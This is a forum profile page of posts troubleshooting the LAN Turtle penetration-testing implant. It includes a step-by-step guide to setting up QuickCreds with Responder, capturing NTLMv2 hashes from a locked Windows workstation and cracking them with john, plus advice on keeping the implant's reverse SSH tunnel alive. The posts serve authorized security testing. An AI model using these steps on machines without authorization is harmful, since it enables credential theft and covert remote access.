Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

panadero's Achievements


Newbie (1/14)

  1. In my current testing, I've had some of the same issues with autossh. The biggest problem I have found, is that once you get the initial connection, the ports stay open on the receiving linux host (not the turtle). So, when turtle tries to create the connection back on 2222, it's already in use, and it dies a horrid death. My fix, is to edit your /etc/ssh/sshd_config options on your receiving host, to alter the keepalives. If not, those ports will stay open for an arbitrary amount of time and drive you to drink...more... Here's my settings: vi /etc/ssh/sshd_config TCPKeepAlive yes ClientAliveInterval 15 (checks every 15 seconds, if ssh conn is dead, kills it) ClientAliveCountMax 3 (just check 3 times) You have to enable the KeepAlives, then have it check (mine every 15 seconds). If there's no connection on the ports, it will close out those ports. The next turtle insertion will work fine. I beat my head on this for a couple of hours, and checked the /var/log/auth.log and found these: Apr 24 07:38:34 callhome sshd[7408]: error: bind []:20000: Address already in use Apr 24 07:38:34 callhome sshd[7408]: error: channel_setup_fwd_listener_tcpip: cannot listen to port: 20000 Apr 24 07:38:34 callhome sshd[7408]: error: bind []:2222: Address already in use Apr 24 07:38:34 callhome sshd[7408]: error: channel_setup_fwd_listener_tcpip: cannot listen to port: 2222 Happy hunting!
  2. Can anybody shed some light on where they're made? Parts in China, assembled in US? All made in US? Thanks!
  3. Remember that you can exit out of the turtle menu to a command prompt. Then cd /etc/turtle/autostart_modules. Cat the 99-autossh module and check out the commands that are running. Copy/paste them into the command line to try them yourself. You'll likely see what the error is and then "Oh dang!", and fix it that way... You can also do a "ps" from the command line, and see the services/commands that are running, that might give you a hint as well. Also check your disk space with "df -h", see how much space rootfs has "Available". If it's critically low, things won't work right. You can do a "du -sh /*" to see which folders at the root level are full. cd into that folder, run it again, etc...til you find the culprit.
  4. Here's what we did to fix it, free up disk space on /
  5. Here's the fix, no disk space available on /, so can't write to /root/loot
  6. Here's my fix for it. Most likely an issue with no disk space on / Don't give up hope @aaronbott
  7. Here's my fix. It's most likely a disk space issue on /
  8. After much chagrin and googling, we found that QuickCreds will not work on the lan turtle because of disk space issues. Here's our fix! (we take no responsibility if you break something/somebody. Only hack when you have prior approval and authorization!) Factory reset, or push the turtle-5.bin firmware to reset (probably need to upgrade to v5 anyway). This makes sure you are set to base. YMMV. Open the lan turtle, push and hold the reset button for at least 5 seconds after plugging it into the machine ssh in to, sh3llz, change password Update the modules list Only install QuickCreds for now, so we have enough space Select QuickCreds and configure Let it install it's dependencies You can now set QuickCreds to 'Enable' so that it will start at boot DO NOT REBOOT YET! At this point, we're going to exit and git clone the responder package DO NOT INSTALL RESPONDER FROM THE TURTLE MODULES LIST ITSELF Exit 'turtle' back to a basic root shell Git clone the Responder package first to /tmp since there is plenty of space. git clone git://github.com/lgandx/Responder /tmp/Responder BUT DON'T REBOOT YET, CAUSE YOU'LL LOSE EVERYTHING IN /tmp du -sh /tmp/Responder 3.8M rm -rf /tmp/Responder/.git rm -rf /tmp/Responder/tools/MultiRelay/ du -sh /tmp/Responder 450.5k We also want to remove the git package as it takes up >1MB of space. QuickCreds installs it /only/ to git the Responder package 😕 opkg remove git df -h 1.2M available on / Move the Responder package back to /etc/turtle/ for QuckCreds to find it mv /tmp/Responder/ /etc/turtle/ df -h 1.1M still available on / now (w00t) The QuickCreds module is hardcoded to use br-lan as the interface. This doesn't exist, so we need to change it to eth0. Another 😕 sed -i 's/br-lan/eth0/' /etc/turtle/modules/QuickCreds You should now have at least 1MB of storage on / and plenty of space for /root/loot to write to, as well as have Responder available for QuickCreds Pop the turtle in a Windows system and wait about 30 seconds until the amber light goes solid, CREDS!!! Copy and paste the hash from /root/loot/#/HTTP-NTLMv2- Paste into a hash file and send it to john with a wordlist john hash.txt --wordlist=wordlist.txt Testing shows this works whether the laptop is locked or not locked. These hashes can not be replayed, only cracked. You still have plenty of space to return to the turtle shell and install any other modules you need at this point. You may need git for something else, but probably not enough space. This set up is for the "Grab creds from a locked Workstation" scenario. You may need MultiRelay for something else...? Not needed for QuickCreds. ENJOY!
  • Create New...